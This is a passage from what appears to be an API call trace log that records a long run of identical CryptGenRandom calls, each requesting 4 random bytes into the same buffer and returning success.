CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.005] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.006] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.007] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 